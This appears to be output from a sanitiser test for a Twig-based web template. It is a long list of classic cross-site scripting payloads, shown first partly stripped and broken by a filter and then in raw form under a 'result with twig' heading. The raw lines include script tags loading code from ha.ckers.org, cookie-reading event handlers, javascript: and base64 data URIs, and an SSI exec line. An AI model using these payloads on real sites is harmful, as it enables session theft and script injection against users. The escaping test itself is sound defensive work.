><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\\r\\n<form><button >lol\\r\\n<!--<img ><img >\\r\\n<![><img ><img >\\r\\n<style><img ><img >\\r\\n<? foo=\\\">\\\">\\r\\n<! foo=\\\">\\\">\\r\\n</ foo=\\\">\\\">\\r\\n<? foo=\\\"><x foo=\\\'?>\\\'>\\\">\\r\\n<! foo=\\\"[[[Inception]]\\\"><x foo=\\\"]foo>\\\">\\r\\n<% foo><x foo=\\\"%>\\\">\\r\\n<div ;color:red;\\\';\\\">LOL\\r\\nLOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>\\r\\n\\r\\n<svg xmlns=\\\"http://www.w3.org/2000/svg\\\">LOL</svg>\\r\\nalert(/XSS/.source)\\r\\n\\\\\\\\\\\";alert(\\\'XSS\\\');//\\r\\n</TITLE>alert(\\\\\\\"XSS\\\\\\\");\\r\\n<INPUT TYPE=\\\\\\\"IMAGE\\\\\\\" SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<BODY BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\">\\r\\n<BODY =alert(\\\'XSS\\\')>\\r\\n<IMG DYNSRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\">\\r\\n<IMG LOWSRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\">\\r\\n<BGSOUND SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<BR SIZE=\\\\\\\"&{alert(\\\'XSS\\\')}\\\\\\\">\\r\\n<LAYER SRC=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"></LAYER>\\r\\n<LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"http://ha.ckers.org/xss.css\\\\\\\">\\r\\n<STYLE>@import\\\'http://ha.ckers.org/xss.css\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\\\\\"Link\\\\\\\" Content=\\\\\\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\\\\\\">\\r\\n<STYLE>BODY{:url(\\\\\\\"http://ha.ckers.org/xssmoz.xml#xss\\\\\\\")}</STYLE>\\r\\n<XSS STYLE=\\\\\\\"(xss.htc);\\\\\\\">\\r\\n<STYLE>li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}</STYLE><UL><LI>XSS\\r\\n<IMG SRC=\\\'(\\\\\\\"XSS\\\\\\\")\\\'>\\r\\n<IMG SRC=\\\\\\\"\\\\\\\">\\r\\n<IMG SRC=\\\\\\\"\\\\\\\">\\r\\nžscriptualert(EXSSE)ž/scriptu\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=(\\\'XSS\\\');\\\\\\\">\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\\\\\">\\r\\n<META HTTP-EQUIV=\\\\\\\"refresh\\\\\\\" CONTENT=\\\\\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\\\\\"\\r\\n<IFRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"></FRAMESET>\\r\\n<TABLE BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\">\\r\\n<TABLE><TD BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\">\\r\\n<DIV STYLE=\\\\\\\"background-image: url((\\\'XSS\\\'))\\\\\\\">\\r\\n<DIV STYLE=\\\\\\\"background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\\\\\">\\r\\n<DIV STYLE=\\\\\\\"background-image: url((\\\'XSS\\\'))\\\\\\\">\\r\\n<DIV STYLE=\\\\\\\"width: alert(\\\'XSS\\\'));\\\\\\\">\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\\\\\"XSS\\\\\\\")\\\';</STYLE>\\r\\n<IMG STYLE=\\\\\\\"xss:expr/*XSS*/ession(alert(\\\'XSS\\\'))\\\\\\\">\\r\\n<XSS STYLE=\\\\\\\"xss:alert(\\\'XSS\\\'))\\\\\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\\\\\"*//*\\\\\\\");\\r\\nxss:ex/*XSS*//*/*/pression(alert(\\\\\\\"XSS\\\\\\\"))\\\'>\\r\\n<STYLE TYPE=\\\\\\\"text/javascript\\\\\\\">alert(\\\'XSS\\\');</STYLE>\\r\\n<STYLE>.XSS{background-image:url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}</STYLE><A CLASS=XSS></A>\\r\\n<STYLE type=\\\\\\\"text/css\\\\\\\">BODY{background:url(\\\\\\\"(\\\'XSS\\\')\\\\\\\")}</STYLE>\\r\\n<!--[if gte IE 4]>\\r\\nalert(\\\'XSS\\\');\\r\\n<![endif]-->\\r\\n<BASE HREF=\\\\\\\"(\\\'XSS\\\');//\\\\\\\">\\r\\n<OBJECT TYPE=\\\\\\\"text/x-scriptlet\\\\\\\" DATA=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"></OBJECT>\\r\\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=(\\\'XSS\\\')></OBJECT>\\r\\n<EMBED SRC=\\\\\\\"http://ha.ckers.org/xss.swf\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"></EMBED>\\r\\n<EMBED SRC=\\\\\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\\\\\" type=\\\\\\\"image/svg+xml\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"></EMBED>\\r\\na=\\\\\\\"get\\\\\\\";\\r\\nb=\\\\\\\"URL(\\\\\\\\\\\"\\\\\\\";\\r\\nc=\\\\\\\"\\\\\\\";\\r\\nd=\\\\\\\"alert(\\\'XSS\\\');\\\\\\\\\\\")\\\\\\\";\\r\\neval(a+b+c+d);\\r\\n<HTML xmlns:xss><?import namespace=\\\\\\\"xss\\\\\\\" implementation=\\\\\\\"http://ha.ckers.org/xss.htc\\\\\\\"><xss:xss>XSS</xss:xss></HTML>\\r\\n<XML ID=I><X><C><![CDATA[<IMG SRC=\\\\\\\"javas]]><![CDATA[cript:alert(\\\'XSS\\\');\\\\\\\">]]>\\r\\n</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\\r\\n<XML ID=\\\\\\\"xss\\\\\\\"><I><B><IMG SRC=\\\\\\\"javas<!-- -->cript:alert(\\\'XSS\\\')\\\\\\\"></B></I></XML>\\r\\n<SPAN DATASRC=\\\\\\\"#xss\\\\\\\" DATAFLD=\\\\\\\"B\\\\\\\" DATAFORMATAS=\\\\\\\"HTML\\\\\\\"></SPAN>\\r\\n<XML SRC=\\\\\\\"xsstest.xml\\\\\\\" ID=I></XML>\\r\\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\\r\\n<HTML><BODY>\\r\\n<?xml:namespace prefix=\\\\\\\"t\\\\\\\" ns=\\\\\\\"urn:schemas-microsoft-com:time\\\\\\\">\\r\\n<?import namespace=\\\\\\\"t\\\\\\\" implementation=\\\\\\\"#default#time2\\\\\\\">\\r\\n<t:set attributeName=\\\\\\\"innerHTML\\\\\\\" to=\\\\\\\"XSS<SCRIPT DEFER>alert("XSS")\\\\\\\">\\r\\n</BODY></HTML>\\r\\n<SCRIPT SRC=\\\\\\\"http://ha.ckers.org/xss.jpg\\\\\\\">\\r\\n<!--#exec cmd=\\\\\\\"/bin/echo \\\'<SCR\\\'\\\\\\\"--><!--#exec cmd=\\\\\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js>\\\'\\\\\\\"-->\\r\\n<? echo(\\\'<SCR)\\\';\\r\\necho(\\\'IPT>alert(\\\\\\\"XSS\\\\\\\")\\\'); ?>\\r\\n<IMG SRC=\\\\\\\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\\\\\">\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser\\r\\n<META HTTP-EQUIV=\\\\\\\"Set-Cookie\\\\\\\" Content=\\\\\\\"USERID=alert(\\\'XSS\\\')\\\\\\\">\\r\\n<HEAD><META HTTP-EQUIV=\\\\\\\"CONTENT-TYPE\\\\\\\" CONTENT=\\\\\\\"text/html; charset=UTF-7\\\\\\\"> </HEAD>\\r\\n<SCRIPT a=\\\\\\\">\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<SCRIPT =\\\\\\\">\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<SCRIPT a=\\\\\\\">\\\\\\\" \\\'\\\' SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<SCRIPT \\\\\\\"a=\\\'>\\\'\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<SCRIPT a=`>` SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<SCRIPT a=\\\\\\\">\\\'>\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n(\\\\\\\"<SCRI\\\\\\\");PT SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<A HREF=\\\\\\\"http://66.102.7.147/\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://www.google.com\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://1113982867/\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://0x42.0x0000066.0x7.0x93/\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://0102.0146.0007.00000223/\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"htt p://6 6.000146.0x7.147/\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"//www.google.com/\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"//google\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://ha.ckers.org@google\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://google:ha.ckers.org\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://google.com/\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://www.google.com./\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"\\\'http://www.google.com/\\\'\\\\\\\">XSS</A>\\r\\n<A HREF=\\\\\\\"http://www.gohttp://www.google.com/ogle.com/\\\\\\\">XSS</A>\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n<\\r\\n\\\\x3c\\r\\n\\\\x3C\\r\\n\\\<\\r\\n\\\<\\r\\n<iframe src=http://ha.ckers.org/scriptlet.html>\\r\\n<IMG SRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\"\\r\\n<SCRIPT SRC=//ha.ckers.org/.js>\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>\\r\\n<alert(\\\\\\\"XSS\\\\\\\");//<\\r\\n<SCRIPT/SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\\\\\"XSS\\\\\\\")>\\r\\n<SCRIPT/XSS SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<IMG SRC=\\\\\\\" (\\\'XSS\\\');\\\\\\\">\\r\\nperl -e \\\'print \\\\\\\"<SCR\\\\0IPT>alert(\\\\\\\\\\\"XSS\\\\\\\\\\\")</SCR\\\\0IPT>\\\\\\\";\\\' > out\\r\\nperl -e \\\'print \\\\\\\"<IMG SRC=java\\\\0script:alert(\\\\\\\\\\\"XSS\\\\\\\\\\\")>\\\\\\\";\\\' > out\\r\\n<IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<IMG SRC=('XSS')>\\r\\n<IMG SRC=('XSS')>\\r\\n<IMG SRC=(\\\'XSS\\\')>\\r\\n<IMG SRC=(String.fromCharCode(88,83,83))>\\r\\n<IMG \\\\\\\"\\\\\\\"\\\\\\\">alert(\\\\\\\"XSS\\\\\\\")\\\\\\\">\\r\\n<IMG SRC=`(\\\\\\\"RSnake says, \\\'XSS\\\'\\\\\\\")`>\\r\\n<IMG SRC=("XSS")>\\r\\n<IMG SRC=(\\\'XSS\\\')>\\r\\n<IMG SRC=(\\\'XSS\\\')>\\r\\n<IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\">\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js>\\r\\n\\\'\\\';!--\\\\\\\"<XSS>=&{()}\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\\\\\";alert(String.fromCharCode(88,83,83))//-->\\\\\\\">\\\'>alert(String.fromCharCode(88,83,83))\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//-->\\\">\\\'>\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG \\\"\\\"\\\">\\\">\\r\\n<IMG >\\r\\n\\r\\n\\r\\n<\\r\\n\\r\\n\\\\\\\";alert(\\\'XSS\\\');//\\r\\n</TITLE>\\r\\n\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\"(\\\'XSS\\\');\\\"></FRAMESET>\\r\\n<TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<DIV url((\\\'XSS\\\'))\\\">\\r\\n<DIV >\\r\\n<DIV alert(\\\'XSS\\\'));\\\">\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\"XSS\\\")\\\';</STYLE>\\r\\n<IMG >\\>\\r\\nexp/*<A >\\r\\n<EMBED SRC=\\\"http://ha.ckers.org/xss.swf\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\na=\\\"get\\\";b=\\\"URL(ja\\\\\\\"\\\";c=\\\"vascr\\\";d=\\\"ipt:ale\\\";e=\\\"rt(\\\'XSS\\\');\\\\\\\")\\\";eval(a+b+c+d+e);\\r\\n\\r\\n<HTML><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS<SCRIPT DEFER>alert("XSS")\\\"></BODY></HTML>\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\">\\r\\n<form id=\\\"test\\\" /><button >TESTHTML5FORMACTION\\r\\n<form><button >crosssitespt\\r\\n<frameset >\\r\\n<!--<img ><img >\\r\\n<style><img ><img >\\r\\n<object data=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\">\\r\\n<embed src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\">\\r\\n<embed src=\\\"(1)\\\">\\r\\n<? foo=\\\">\\\">\\r\\n<! foo=\\\">\\\">\\r\\n</ foo=\\\">\\\">\\r\\n\\r\\n\\r\\n\\r\\n{alert(1)};1\\r\\n\\r\\n<svg xmlns=\\\"#\\\"></svg>\\r\\n<svg xmlns=\\\"#\\\"></svg>\\r\\n<iframe xmlns=\\\"#\\\" src=\\\"(1)\\\"></iframe>\\r\\n\\r\\n\\r\\n"><"\\r\\n"><"\\r\\n\\r\\n“><s”+”cript>alert()\\r\\n“>\\r\\n“><\\r\\nfoo\\r\\n<scralert()\\r\\n"/><BODY src=http://my.box.com/xss.js>")’>\\r\\n‘; alert(); var foo=’\\r\\nfoo\\\\’; alert();//’;\\r\\n\\r\\n<img >\\>\\r\\n\\r\\n\\\">\\r\\n<video >\\r\\n<audio >\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//-->\\\">\\\'>\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n0\\\\\\\"autofocus/=alert(1)--><video/>\\\"->\\r\\n<video/>\\>\\r\\n\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<a >xxs link</a>\\r\\n<a >xxs link</a>\\r\\n<IMG \\\"\\\"\\\">\\\">\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG ></img>\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\r\\n\\r\\n<BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n\\r\\n<\\r\\n\\r\\n\\r\\n<IMG >\\r\\n</TITLE>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<IMG >\\r\\n<IMG >\\r\\n<STYLE>li {list-style-image: url(\\\"(\\\'XSS\\\')\\\");}</STYLE><UL><LI>XSS</br>\\r\\n<IMG >\\r\\n<IMG >\\r\\n<BODY >\\r\\n<BGSOUND SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<BR SIZE=\\\"&{alert(\\\'XSS\\\')}\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"(\\\'XSS\\\');\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\">\\r\\n<STYLE>@import\\\'http://ha.ckers.org/xss.css\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\\">\\r\\n<STYLE>BODY{:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}</STYLE>\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\"XSS\\\")\\\';</STYLE>\\r\\n<IMG >\\r\\nexp/*<A >\\r\\n<STYLE TYPE=\\\"text/javascript\\\">alert(\\\'XSS\\\');</STYLE>\\r\\n<STYLE>.XSS{background-image:url(\\\"(\\\'XSS\\\')\\\");}</STYLE><A ></A>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<XSS >\\r\\n<XSS >\\r\\n\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=(\\\'XSS\\\');\\\">\\r\\n<IFRAME SRC=\\\"(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# ></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\"(\\\'XSS\\\');\\\"></FRAMESET>

result with twig: {{ xss.xss | escape }}:

\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=javascript:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=JaVaScRiPt:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=javascript:alert(\\\"XSS\\\")>\\r\\n<IMG SRC=`javascript:alert(\\\"RSnake says, \\\'XSS\\\'\\\")`>\\r\\n<a onmouseover=\\\"alert(document.cookie)\\\">xxs link</a>\\r\\n<a onmouseover=alert(document.cookie)>xxs link</a>\\r\\n<IMG \\\"\\\"\\\"><SCRIPT>alert(\\\"XSS\\\")</SCRIPT>\\\">\\r\\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\\r\\n<IMG SRC=# onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG SRC= onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\\r\\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\\r\\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\\r\\n<IMG SRC=\\\"jav ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x09;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0A;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0D;ascript:alert(\\\'XSS\\\');\\\">\\r\\nperl -e \\\'print \\\"<IMG SRC=java\\\\0script:alert(\\\\\\\"XSS\\\\\\\")>\\\";\\\' > out\\r\\n<IMG SRC=\\\" &#14; javascript:alert(\\\'XSS\\\');\\\">\\r\\n<SCRIPT/XSS SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n<SCRIPT/SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<<SCRIPT>alert(\\\"XSS\\\");//<</SCRIPT>\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\\r\\n<SCRIPT SRC=//ha.ckers.org/.j>\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\')\\\"\\r\\n<iframe src=http://ha.ckers.org/scriptlet.html <\\r\\n\\\\\\\";alert(\\\'XSS\\\');//\\r\\n</TITLE><SCRIPT>alert(\\\"XSS\\\");</SCRIPT>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<BODY BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IMG DYNSRC=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IMG LOWSRC=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<STYLE>li {list-style-image: url(\\\"javascript:alert(\\\'XSS\\\')\\\");}</STYLE><UL><LI>XSS</br>\\r\\n<IMG SRC=\\\'vbscript:msgbox(\\\"XSS\\\")\\\'>\\r\\n<IMG SRC=\\\"livescript:[code]\\\">\\r\\n<BODY ONLOAD=alert(\\\'XSS\\\')>\\r\\n<BGSOUND SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<BR SIZE=\\\"&{alert(\\\'XSS\\\')}\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\">\\r\\n<STYLE>@import\\\'http://ha.ckers.org/xss.css\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\\">\\r\\n<STYLE>BODY{-moz-binding:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}</STYLE>\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\"XSS\\\")\\\';</STYLE>\\r\\n<IMG STYLE=\\\"xss:expr/*XSS*/ession(alert(\\\'XSS\\\'))\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(alert(\\\"XSS\\\"))\\\'>\\r\\n<STYLE TYPE=\\\"text/javascript\\\">alert(\\\'XSS\\\');</STYLE>\\r\\n<STYLE>.XSS{background-image:url(\\\"javascript:alert(\\\'XSS\\\')\\\");}</STYLE><A CLASS=XSS></A>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"javascript:alert(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"javascript:alert(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<XSS STYLE=\\\"xss:expression(alert(\\\'XSS\\\'))\\\">\\r\\n<XSS STYLE=\\\"behavior: url(xss.htc);\\\">\\r\\n¼script¾alert(¢XSS¢)¼/script¾\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:alert(\\\'XSS\\\');\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></FRAMESET>\\r\\n<TABLE BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<DIV STYLE=\\\"background-image: url(javascript:alert(\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\">\\r\\n<DIV STYLE=\\\"background-image: url(&#1;javascript:alert(\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"width: expression(alert(\\\'XSS\\\'));\\\">\\r\\n<BASE HREF=\\\"javascript:alert(\\\'XSS\\\');//\\\">\\r\\n <OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"></OBJECT>\\r\\n<EMBED SRC=\\\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs 